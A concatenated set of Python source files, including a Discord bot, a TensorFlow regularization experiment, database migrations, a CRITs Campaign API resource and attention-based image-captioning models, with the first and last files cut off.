field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='rearporttemplates', to='dcim.DeviceType'),
),
]
|
py | 1a346668abc023308ef21224b24ca11661c211a9 | import discord
import os
from discord.ext import commands, tasks
from discord.utils import get
from discord.ext.commands import CheckFailure
from discord.ext.commands import MissingPermissions
import random
from alive import alive
import json
intents = discord.Intents.all()
intents.members = True
def get_prefix(client, message):
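# Look up this guild's command prefix from prefixes.json (populated with a default
# of ">" in on_guild_join below).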
with open ("prefixes.json", "r") as f:
prefixes = json.load(f)
return prefixes[str(message.guild.id)]
bot = commands.Bot(command_prefix=get_prefix, intents=intents)
bot.remove_command('help')
my_secret = os.environ['Token']
@bot.event
async def on_guild_join(guild):
with open ("prefixes.json", "r") as f:
prefixes = json.load(f)
prefixes[str(guild.id)] = ">"
with open("prefixes.json", "w") as f:
json.dump(prefixes, f, indent = 4)
@bot.event
async def on_guild_remove(guild):
with open ("prefixes.json", "r") as f:
prefixes = json.load(f)
prefixes.pop(str(guild.id))
with open("prefixes.json", "w") as f:
json.dump(prefixes, f, indent = 4)
#ChangePrefix
@bot.command()
@commands.has_permissions(manage_messages=True)
async def prefix(ctx, prefix):
with open ("prefixes.json", "r") as f:
prefixes = json.load(f)
prefixes[str(ctx.guild.id)] = prefix
await ctx.send("The prefix has been changed to: "+ prefix)
with open("prefixes.json", "w") as f:
json.dump(prefixes, f, indent = 4)
@prefix.error
async def prefix_error(ctx, error):
if isinstance (error, commands.MissingRequiredArgument):
await ctx.send('Please enter a prefix.')
if isinstance (error, commands.MissingPermissions):
await ctx.send('Aha comrade, that one is not for you.')
@bot.event
async def on_ready():
print("Bot is ready.")
await bot.change_presence(status=discord.Status.online, activity=discord.Game('Having A Midlife Crisis...'))
#join_message
@bot.event
async def on_member_join(member):
guild_id = member.guild.id
av = member.avatar_url
if guild_id == 842401531171962911:
channel = bot.get_channel(853879745263566898)
e = discord.Embed(color = discord.Color.green())
e.set_thumbnail(url=av)
e.add_field(name="Welcome!!", value=f"Welcome to the server {member.mention}!! Hope you have a good time! If you need any help regarding discord, please contact and admins or mods. If you need any help regarding questions, don't hesitate to ask in the doubt channels . And at last, please check self-roles at <#842413732167811152>")
await channel.send(embed=e)
else:
print('Currently Thinking.')
#server_leave
@bot.event
async def on_member_remove(member):
guild_id = member.guild.id
if guild_id == 842401531171962911:
channel = bot.get_channel(842607234160525334)
e = discord.Embed(color = discord.Colour.red())
e.set_thumbnail(url=member.avatar_url)
e.add_field(name="Member Left", value = f"{member} Has left the server.")
await channel.send(embed=e)
else:
print("Currently thinking.")
#NoCommandError
@bot.event
async def on_command_error(ctx, error):
if isinstance(error, commands.CommandNotFound):
await ctx.send('No such command exists!')
#Welcome
@bot.command()
async def welcome(ctx):
await ctx.send(f'Welcome to the server!! Hope you have a good time! For help regarding Discord, please go to <#846802868215218177>. For any subject-related help, please go to the respective doubts channel in the Doubts category. For a general chit-chat with our community, have fun at <#842407125329903616>!')
#CogLoad
@bot.command()
@commands.has_role('Owner')
async def load(ctx, extension):
bot.load_extension(f'cogs.{extension}')
@load.error
async def load_error(ctx, error):
if isinstance(error, commands.MissingRole):
await ctx.send('Sorry, but you do not have perms to use that command!')
#CogUnload
@bot.command()
@commands.has_role('Owner')
async def unload(ctx, extension):
bot.unload_extension(f'cogs.{extension}')
@unload.error
async def unload_error(ctx, error):
if isinstance(error, commands.MissingRole):
await ctx.send('Sorry, but you do not have perms to use that command!')
#CogReload
@bot.command()
@commands.has_role('Owner')
async def reload(ctx, extension):
bot.unload_extension(f'cogs.{extension}')
bot.load_extension(f'cogs.{extension}')
@reload.error
async def reload_error(ctx, error):
if isinstance(error, commands.MissingRole):
await ctx.send('Sorry, but you do not have perms to use that command!')
#Ping
@bot.command()
async def ping(ctx):
await ctx.send(f'Pong! {round(bot.latency*1000)}ms.')
#GitHub
@bot.command()
async def github(ctx):
embed = discord.Embed(title="GitHub Repo Link", color=discord.Colour.orange())
embed.add_field(name="Hydra Bot", value="https://github.com/doughnut9/Discord-Multipurpose-Bot" )
await ctx.send(embed=embed)
for filename in os.listdir('./cogs'):
if filename.endswith('.py'):
bot.load_extension(f'cogs.{filename[:-3]}')
alive()
bot.run(os.getenv('Token'))
|
py | 1a34687f48cec595d3161ef255fc0f95b014f004 | #!/usr/bin/python
import tensorflow as tf
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, BatchNormalization, Dropout
PARAMETER_EXPERIMENTS = ['l1_scalar', 'l2_scalar', 'fc_dropout_rate']#e.g. dropout rate
class Network:
def __init__(self, experimentType, **kwargs):
self.validExperimentTypes = ['control', 'batchnorm', 'dropout', 'l2', 'l1']
assert(experimentType in self.validExperimentTypes), ("Invalid experiment type.. Please choose from:\n" + str(self.validExperimentTypes))
self.experimentType = experimentType
l_scalars = 0.001
self.l1_scalar = kwargs['l1_scalar'] if 'l1_scalar' in kwargs else l_scalars
self.l2_scalar = kwargs['l2_scalar'] if 'l2_scalar' in kwargs else l_scalars
self.fc_dropout_rate = kwargs['fc_dropout_rate'] if 'fc_dropout_rate' in kwargs else .5
print(kwargs)
self.build()
def build(self):
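# Choose a kernel regularizer only for the 'l1'/'l2' experiments; the 'batchnorm'
# and 'dropout' experiments instead insert the corresponding layers further below.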
regularizer = None
if self.experimentType == 'l2':
regularizer = tf.keras.regularizers.l2(self.l2_scalar)
elif self.experimentType == 'l1':
regularizer = tf.keras.regularizers.l1(self.l1_scalar)
model = tf.keras.Sequential()
# Must define the input shape in the first layer of the neural network
model.add(Conv2D(filters=64, kernel_size=2, padding='same', activation='relu', input_shape=(28,28,1), kernel_regularizer=regularizer))
if self.experimentType == "batchnorm":
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=2))
model.add(Conv2D(filters=32, kernel_size=2, padding='same', activation='relu', kernel_regularizer=regularizer))
if self.experimentType == "batchnorm":
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=2))
model.add(Flatten())
model.add(Dense(256, activation='relu', kernel_regularizer=regularizer))
if self.experimentType == 'dropout':
model.add(Dropout(self.fc_dropout_rate))
if self.experimentType == "batchnorm":
model.add(BatchNormalization())
model.add(Dense(10, activation='softmax', kernel_regularizer=regularizer))
# Take a look at the model summary
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
self.model = model
def train(self, x_train, y_train, x_valid, y_valid, batchSize, epochs):
return self.model.fit(x_train, y_train, batch_size=batchSize, epochs=epochs, validation_data=(x_valid, y_valid)).history
def test(self, x_test, y_test):
# Evaluate the model on test set
score = self.model.evaluate(x_test, y_test, verbose=0)
# Print test accuracy
print(score)
print('\n', 'Test accuracy:', score[1])
return score[1]
if __name__ == "__main__":
net = Network('l1')
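# A hypothetical end-to-end run (data loading is not part of this file; the dataset,
# batch size and epoch count below are assumptions):
#   (x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
#   x_train = x_train.reshape(-1, 28, 28, 1) / 255.0
#   x_test = x_test.reshape(-1, 28, 28, 1) / 255.0
#   y_train = tf.keras.utils.to_categorical(y_train, 10)
#   y_test = tf.keras.utils.to_categorical(y_test, 10)
#   net.train(x_train, y_train, x_test, y_test, batchSize=64, epochs=5)
#   net.test(x_test, y_test)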
|
py | 1a346971efea37ba3221dbdc8a7334f646b5d37a | from register.models import jfuser,jfcompany,jfadmin,usercompany
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from django.shortcuts import render_to_response
from django.shortcuts import render
from django.http import Http404, HttpResponseRedirect, HttpResponse
# Create your views here.
|
py | 1a346fbb45181bc8f463a71540555eea4c33f626 | """users table
Revision ID: 6c6be1ace116
Revises:
Create Date: 2021-08-26 21:28:47.593295
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6c6be1ace116'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=64), nullable=True),
sa.Column('email', sa.String(length=120), nullable=True),
sa.Column('password_hash', sa.String(length=128), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)
op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_user_username'), table_name='user')
op.drop_index(op.f('ix_user_email'), table_name='user')
op.drop_table('user')
# ### end Alembic commands ###
|
py | 1a3471102f0e8f1d36b61e63189e30dc879aad53 | # -*- coding: utf-8 -*-
from functools import wraps
class ApiException(Exception):
def __init__(self, message, code):
self.message = message
self.code = code
def __str__(self):
return "Message: %s Status code: %d" % (self.message, self.code)
|
py | 1a34722bb3b0a36c036e8aea14e9be3c5c62f435 | from django.core.urlresolvers import reverse
from tastypie import authorization
from tastypie.authentication import MultiAuthentication
from tastypie.exceptions import BadRequest
from crits.campaigns.campaign import Campaign
from crits.campaigns.handlers import add_campaign
from crits.core.api import CRITsApiKeyAuthentication, CRITsSessionAuthentication
from crits.core.api import CRITsSerializer, CRITsAPIResource
class CampaignResource(CRITsAPIResource):
"""
Class to handle everything related to the Campaign API.
Currently supports GET and POST.
"""
class Meta:
object_class = Campaign
allowed_methods = ('get', 'post')
resource_name = "campaigns"
authentication = MultiAuthentication(CRITsApiKeyAuthentication(),
CRITsSessionAuthentication())
authorization = authorization.Authorization()
serializer = CRITsSerializer()
def get_object_list(self, request):
"""
Use the CRITsAPIResource to get our objects but provide the class to get
the objects from.
:param request: The incoming request.
:type request: :class:`django.http.HttpRequest`
:returns: Resulting objects in the specified format (JSON by default).
"""
return super(CampaignResource, self).get_object_list(request, Campaign,
False)
def obj_create(self, bundle, **kwargs):
"""
Handles creating Campaigns through the API.
:param bundle: Bundle containing the information to create the Campaign.
:type bundle: Tastypie Bundle object.
:returns: HttpResponse.
"""
analyst = bundle.request.user.username
name = bundle.data.get('name', None)
description = bundle.data.get('description', None)
aliases = bundle.data.get('aliases', None)
bucket_list = bundle.data.get('bucket_list', None)
ticket = bundle.data.get('ticket', None)
content = {'return_code': 1,
'type': 'Campaign'}
if not name:
content['message'] = 'Need a Campaign name.'
self.crits_response(content)
result = add_campaign(name,
description,
aliases,
analyst,
bucket_list,
ticket)
if result.get('id'):
url = reverse('api_dispatch_detail',
kwargs={'resource_name': 'campaigns',
'api_name': 'v1',
'pk': result.get('id')})
content['url'] = url
content['id'] = result.get('id')
if result['success']:
content['return_code'] = 0
content['message'] = result['message']
self.crits_response(content)
|
py | 1a34722f56062a05da921394cadb14eeebc52852 | # This file contains Att2in2, AdaAtt, AdaAttMO, TopDown model
# AdaAtt is from Knowing When to Look: Adaptive Attention via A Visual Sentinel for Image Captioning
# https://arxiv.org/abs/1612.01887
# AdaAttMO is a modified version with maxout lstm
# Att2in is from Self-critical Sequence Training for Image Captioning
# https://arxiv.org/abs/1612.00563
# In this file we only have Att2in2, which is a slightly different version of att2in,
# in which the img feature embedding and word embedding is the same as what in adaatt.
# TopDown is from Bottom-Up and Top-Down Attention for Image Captioning and VQA
# https://arxiv.org/abs/1707.07998
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import *
import misc.utils as utils
from .CaptionModel import CaptionModel
class AttModel(CaptionModel):
def __init__(self, opt):
super(AttModel, self).__init__()
self.vocab_size = opt.vocab_size
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.seq_length = opt.seq_length
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
self.ss_prob = 0.0 # Schedule sampling probability
self.embed = nn.Sequential(nn.Embedding(self.vocab_size + 1, self.input_encoding_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.fc_embed = nn.Sequential(nn.Linear(self.fc_feat_size, self.rnn_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.att_embed = nn.Sequential(nn.Linear(self.att_feat_size, self.rnn_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.logit = nn.Linear(self.rnn_size, self.vocab_size + 1)
self.ctx2att = nn.Linear(self.rnn_size, self.att_hid_size)
def init_hidden(self, bsz):
weight = next(self.parameters()).data
return (Variable(weight.new(self.num_layers, bsz, self.rnn_size).zero_()),
Variable(weight.new(self.num_layers, bsz, self.rnn_size).zero_()))
def forward(self, fc_feats, att_feats, seq):
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
outputs = []
# embed fc and att feats
fc_feats = self.fc_embed(fc_feats)
_att_feats = self.att_embed(att_feats.view(-1, self.att_feat_size))
att_feats = _att_feats.view(*(att_feats.size()[:-1] + (self.rnn_size,)))
# Project the attention feats first to reduce memory and computation consumption.
p_att_feats = self.ctx2att(att_feats.view(-1, self.rnn_size))
p_att_feats = p_att_feats.view(*(att_feats.size()[:-1] + (self.att_hid_size,)))
for i in range(seq.size(1) - 1):
if self.training and i >= 1 and self.ss_prob > 0.0: # otherwise no need to sample
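# Scheduled sampling: with probability ss_prob, feed the word sampled from the
# model's previous output distribution instead of the ground-truth token.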
sample_prob = fc_feats.data.new(batch_size).uniform_(0, 1)
sample_mask = sample_prob < self.ss_prob
if sample_mask.sum() == 0:
it = seq[:, i].clone()
else:
sample_ind = sample_mask.nonzero().view(-1)
it = seq[:, i].data.clone()
#prob_prev = torch.exp(outputs[-1].data.index_select(0, sample_ind)) # fetch prev distribution: shape Nx(M+1)
#it.index_copy_(0, sample_ind, torch.multinomial(prob_prev, 1).view(-1))
prob_prev = torch.exp(outputs[-1].data) # fetch prev distribution: shape Nx(M+1)
it.index_copy_(0, sample_ind, torch.multinomial(prob_prev, 1).view(-1).index_select(0, sample_ind))
it = Variable(it, requires_grad=False)
else:
it = seq[:, i].clone()
# break if all the sequences end
if i >= 1 and seq[:, i].data.sum() == 0:
break
xt = self.embed(it)
output, state = self.core(xt, fc_feats, att_feats, p_att_feats, state)
output = F.log_softmax(self.logit(output))
outputs.append(output)
return torch.cat([_.unsqueeze(1) for _ in outputs], 1)
def get_logprobs_state(self, it, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, state):
# 'it' is a Variable containing a word index
xt = self.embed(it)
output, state = self.core(xt, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, state)
logprobs = F.log_softmax(self.logit(output))
return logprobs, state
def sample_beam(self, fc_feats, att_feats, opt={}):
beam_size = opt.get('beam_size', 10)
batch_size = fc_feats.size(0)
# embed fc and att feats
fc_feats = self.fc_embed(fc_feats)
_att_feats = self.att_embed(att_feats.view(-1, self.att_feat_size))
att_feats = _att_feats.view(*(att_feats.size()[:-1] + (self.rnn_size,)))
# Project the attention feats first to reduce memory and computation consumption.
p_att_feats = self.ctx2att(att_feats.view(-1, self.rnn_size))
p_att_feats = p_att_feats.view(*(att_feats.size()[:-1] + (self.att_hid_size,)))
assert beam_size <= self.vocab_size + 1, 'lets assume this for now, otherwise this corner case causes a few headaches down the road. can be dealt with in future if needed'
seq = torch.LongTensor(self.seq_length, batch_size).zero_()
seqLogprobs = torch.FloatTensor(self.seq_length, batch_size)
# lets process every image independently for now, for simplicity
self.done_beams = [[] for _ in range(batch_size)]
for k in range(batch_size):
state = self.init_hidden(beam_size)
tmp_fc_feats = fc_feats[k:k+1].expand(beam_size, fc_feats.size(1))
tmp_att_feats = att_feats[k:k+1].expand(*((beam_size,)+att_feats.size()[1:])).contiguous()
tmp_p_att_feats = p_att_feats[k:k+1].expand(*((beam_size,)+p_att_feats.size()[1:])).contiguous()
for t in range(1):
if t == 0: # input <bos>
it = fc_feats.data.new(beam_size).long().zero_()
xt = self.embed(Variable(it, requires_grad=False))
output, state = self.core(xt, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, state)
logprobs = F.log_softmax(self.logit(output))
self.done_beams[k] = self.beam_search(state, logprobs, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, opt=opt)
seq[:, k] = self.done_beams[k][0]['seq'] # the first beam has highest cumulative score
seqLogprobs[:, k] = self.done_beams[k][0]['logps']
# return the samples and their log likelihoods
return seq.transpose(0, 1), seqLogprobs.transpose(0, 1)
def sample(self, fc_feats, att_feats, opt={}):
sample_max = opt.get('sample_max', 1)
beam_size = opt.get('beam_size', 1)
temperature = opt.get('temperature', 1.0)
if beam_size > 1:
return self.sample_beam(fc_feats, att_feats, opt)
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
# embed fc and att feats
fc_feats = self.fc_embed(fc_feats)
_att_feats = self.att_embed(att_feats.view(-1, self.att_feat_size))
att_feats = _att_feats.view(*(att_feats.size()[:-1] + (self.rnn_size,)))
        # Project the attention feats first to reduce memory and computation consumption.
p_att_feats = self.ctx2att(att_feats.view(-1, self.rnn_size))
p_att_feats = p_att_feats.view(*(att_feats.size()[:-1] + (self.att_hid_size,)))
seq = []
seqLogprobs = []
for t in range(self.seq_length + 1):
if t == 0: # input <bos>
it = fc_feats.data.new(batch_size).long().zero_()
elif sample_max:
sampleLogprobs, it = torch.max(logprobs.data, 1)
it = it.view(-1).long()
else:
if temperature == 1.0:
prob_prev = torch.exp(logprobs.data).cpu() # fetch prev distribution: shape Nx(M+1)
else:
# scale logprobs by temperature
prob_prev = torch.exp(torch.div(logprobs.data, temperature)).cpu()
it = torch.multinomial(prob_prev, 1)
sampleLogprobs = logprobs.gather(1, Variable(it, requires_grad=False)) # gather the logprobs at sampled positions
it = it.view(-1).long() # and flatten indices for downstream processing
xt = self.embed(Variable(it, requires_grad=False))
if t >= 1:
# stop when all finished
if t == 1:
unfinished = it > 0
else:
unfinished = unfinished * (it > 0)
if unfinished.sum() == 0:
break
it = it * unfinished.type_as(it)
                seq.append(it)  # seq[t] is the input at time step t+2
seqLogprobs.append(sampleLogprobs.view(-1))
output, state = self.core(xt, fc_feats, att_feats, p_att_feats, state)
logprobs = F.log_softmax(self.logit(output))
return torch.cat([_.unsqueeze(1) for _ in seq], 1), torch.cat([_.unsqueeze(1) for _ in seqLogprobs], 1)
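    # Illustrative call patterns for sample() (hypothetical tensors and option values,
    # not taken from the surrounding code):
    #   seq, logprobs = model.sample(fc_feats, att_feats, opt={'sample_max': 1})   # greedy argmax decoding
    #   seq, logprobs = model.sample(fc_feats, att_feats, opt={'sample_max': 0, 'temperature': 0.8})  # stochastic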
class AdaAtt_lstm(nn.Module):
def __init__(self, opt, use_maxout=True):
super(AdaAtt_lstm, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
self.use_maxout = use_maxout
# Build a LSTM
self.w2h = nn.Linear(self.input_encoding_size, (4+(use_maxout==True)) * self.rnn_size)
self.v2h = nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size)
self.i2h = nn.ModuleList([nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size) for _ in range(self.num_layers - 1)])
self.h2h = nn.ModuleList([nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size) for _ in range(self.num_layers)])
# Layers for getting the fake region
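        # The "fake region" acts as the visual sentinel of adaptive attention: a vector
        # computed from the LSTM state that the attention module can attend to instead
        # of any real image region.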
if self.num_layers == 1:
self.r_w2h = nn.Linear(self.input_encoding_size, self.rnn_size)
self.r_v2h = nn.Linear(self.rnn_size, self.rnn_size)
else:
self.r_i2h = nn.Linear(self.rnn_size, self.rnn_size)
self.r_h2h = nn.Linear(self.rnn_size, self.rnn_size)
def forward(self, xt, img_fc, state):
hs = []
cs = []
for L in range(self.num_layers):
# c,h from previous timesteps
prev_h = state[0][L]
prev_c = state[1][L]
# the input to this layer
if L == 0:
x = xt
i2h = self.w2h(x) + self.v2h(img_fc)
else:
x = hs[-1]
x = F.dropout(x, self.drop_prob_lm, self.training)
i2h = self.i2h[L-1](x)
all_input_sums = i2h+self.h2h[L](prev_h)
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
# decode the gates
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
# decode the write inputs
if not self.use_maxout:
in_transform = F.tanh(all_input_sums.narrow(1, 3 * self.rnn_size, self.rnn_size))
else:
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
# perform the LSTM update
next_c = forget_gate * prev_c + in_gate * in_transform
# gated cells form the output
tanh_nex_c = F.tanh(next_c)
next_h = out_gate * tanh_nex_c
if L == self.num_layers-1:
if L == 0:
i2h = self.r_w2h(x) + self.r_v2h(img_fc)
else:
i2h = self.r_i2h(x)
n5 = i2h+self.r_h2h(prev_h)
fake_region = F.sigmoid(n5) * tanh_nex_c
cs.append(next_c)
hs.append(next_h)
# set up the decoder
top_h = hs[-1]
top_h = F.dropout(top_h, self.drop_prob_lm, self.training)
fake_region = F.dropout(fake_region, self.drop_prob_lm, self.training)
state = (torch.cat([_.unsqueeze(0) for _ in hs], 0),
torch.cat([_.unsqueeze(0) for _ in cs], 0))
return top_h, fake_region, state
class AdaAtt_attention(nn.Module):
def __init__(self, opt):
super(AdaAtt_attention, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.drop_prob_lm = opt.drop_prob_lm
self.att_hid_size = opt.att_hid_size
# fake region embed
self.fr_linear = nn.Sequential(
nn.Linear(self.rnn_size, self.input_encoding_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.fr_embed = nn.Linear(self.input_encoding_size, self.att_hid_size)
# h out embed
self.ho_linear = nn.Sequential(
nn.Linear(self.rnn_size, self.input_encoding_size),
nn.Tanh(),
nn.Dropout(self.drop_prob_lm))
self.ho_embed = nn.Linear(self.input_encoding_size, self.att_hid_size)
self.alpha_net = nn.Linear(self.att_hid_size, 1)
self.att2h = nn.Linear(self.rnn_size, self.rnn_size)
def forward(self, h_out, fake_region, conv_feat, conv_feat_embed):
# View into three dimensions
att_size = conv_feat.numel() // conv_feat.size(0) // self.rnn_size
conv_feat = conv_feat.view(-1, att_size, self.rnn_size)
conv_feat_embed = conv_feat_embed.view(-1, att_size, self.att_hid_size)
        # view neighbor from batch_size * neighbor_num x rnn_size to batch_size x rnn_size * neighbor_num
fake_region = self.fr_linear(fake_region)
fake_region_embed = self.fr_embed(fake_region)
h_out_linear = self.ho_linear(h_out)
h_out_embed = self.ho_embed(h_out_linear)
txt_replicate = h_out_embed.unsqueeze(1).expand(h_out_embed.size(0), att_size + 1, h_out_embed.size(1))
img_all = torch.cat([fake_region.view(-1,1,self.input_encoding_size), conv_feat], 1)
img_all_embed = torch.cat([fake_region_embed.view(-1,1,self.input_encoding_size), conv_feat_embed], 1)
hA = F.tanh(img_all_embed + txt_replicate)
hA = F.dropout(hA,self.drop_prob_lm, self.training)
hAflat = self.alpha_net(hA.view(-1, self.att_hid_size))
PI = F.softmax(hAflat.view(-1, att_size + 1))
visAtt = torch.bmm(PI.unsqueeze(1), img_all)
visAttdim = visAtt.squeeze(1)
atten_out = visAttdim + h_out_linear
h = F.tanh(self.att2h(atten_out))
h = F.dropout(h, self.drop_prob_lm, self.training)
return h
class AdaAttCore(nn.Module):
def __init__(self, opt, use_maxout=False):
super(AdaAttCore, self).__init__()
self.lstm = AdaAtt_lstm(opt, use_maxout)
self.attention = AdaAtt_attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state):
h_out, p_out, state = self.lstm(xt, fc_feats, state)
atten_out = self.attention(h_out, p_out, att_feats, p_att_feats)
return atten_out, state
class TopDownCore(nn.Module):
def __init__(self, opt, use_maxout=False):
super(TopDownCore, self).__init__()
self.drop_prob_lm = opt.drop_prob_lm
self.att_lstm = nn.LSTMCell(opt.input_encoding_size + opt.rnn_size * 2, opt.rnn_size) # we, fc, h^2_t-1
self.lang_lstm = nn.LSTMCell(opt.rnn_size * 2, opt.rnn_size) # h^1_t, \hat v
self.attention = Attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state):
prev_h = state[0][-1]
att_lstm_input = torch.cat([prev_h, fc_feats, xt], 1)
h_att, c_att = self.att_lstm(att_lstm_input, (state[0][0], state[1][0]))
att = self.attention(h_att, att_feats, p_att_feats)
lang_lstm_input = torch.cat([att, h_att], 1)
# lang_lstm_input = torch.cat([att, F.dropout(h_att, self.drop_prob_lm, self.training)], 1) ?????
h_lang, c_lang = self.lang_lstm(lang_lstm_input, (state[0][1], state[1][1]))
output = F.dropout(h_lang, self.drop_prob_lm, self.training)
state = (torch.stack([h_att, h_lang]), torch.stack([c_att, c_lang]))
return output, state
class Attention(nn.Module):
def __init__(self, opt):
super(Attention, self).__init__()
self.rnn_size = opt.rnn_size
self.att_hid_size = opt.att_hid_size
self.h2att = nn.Linear(self.rnn_size, self.att_hid_size)
self.alpha_net = nn.Linear(self.att_hid_size, 1)
def forward(self, h, att_feats, p_att_feats):
# The p_att_feats here is already projected
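        # Shape walk-through (illustrative): att_feats is (batch, att_size, rnn_size) and
        # p_att_feats is its pre-computed projection to att_hid_size; the hidden state h is
        # projected, broadcast over att_size, combined additively, squashed with tanh, and
        # reduced to one scalar score per region before the softmax below.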
att_size = att_feats.numel() // att_feats.size(0) // self.rnn_size
att = p_att_feats.view(-1, att_size, self.att_hid_size)
att_h = self.h2att(h) # batch * att_hid_size
att_h = att_h.unsqueeze(1).expand_as(att) # batch * att_size * att_hid_size
dot = att + att_h # batch * att_size * att_hid_size
dot = F.tanh(dot) # batch * att_size * att_hid_size
dot = dot.view(-1, self.att_hid_size) # (batch * att_size) * att_hid_size
dot = self.alpha_net(dot) # (batch * att_size) * 1
dot = dot.view(-1, att_size) # batch * att_size
weight = F.softmax(dot) # batch * att_size
att_feats_ = att_feats.view(-1, att_size, self.rnn_size) # batch * att_size * att_feat_size
att_res = torch.bmm(weight.unsqueeze(1), att_feats_).squeeze(1) # batch * att_feat_size
return att_res
class Att2in2Core(nn.Module):
def __init__(self, opt):
super(Att2in2Core, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
#self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
# Build a LSTM
self.a2c = nn.Linear(self.rnn_size, 2 * self.rnn_size)
self.i2h = nn.Linear(self.input_encoding_size, 5 * self.rnn_size)
self.h2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
self.dropout = nn.Dropout(self.drop_prob_lm)
self.attention = Attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state):
att_res = self.attention(state[0][-1], att_feats, p_att_feats)
all_input_sums = self.i2h(xt) + self.h2h(state[0][-1])
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size) + \
self.a2c(att_res)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
next_c = forget_gate * state[1][-1] + in_gate * in_transform
next_h = out_gate * F.tanh(next_c)
output = self.dropout(next_h)
state = (next_h.unsqueeze(0), next_c.unsqueeze(0))
return output, state
class AdaAttModel(AttModel):
def __init__(self, opt):
super(AdaAttModel, self).__init__(opt)
self.core = AdaAttCore(opt)
# AdaAtt with maxout lstm
class AdaAttMOModel(AttModel):
def __init__(self, opt):
super(AdaAttMOModel, self).__init__(opt)
self.core = AdaAttCore(opt, True)
class Att2in2Model(AttModel):
def __init__(self, opt):
super(Att2in2Model, self).__init__(opt)
self.core = Att2in2Core(opt)
delattr(self, 'fc_embed')
self.fc_embed = lambda x : x
class TopDownModel(AttModel):
def __init__(self, opt):
super(TopDownModel, self).__init__(opt)
self.num_layers = 2
self.core = TopDownCore(opt)
|
py | 1a3472d56c71b8ff1cd77ae369d52684b7223731 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
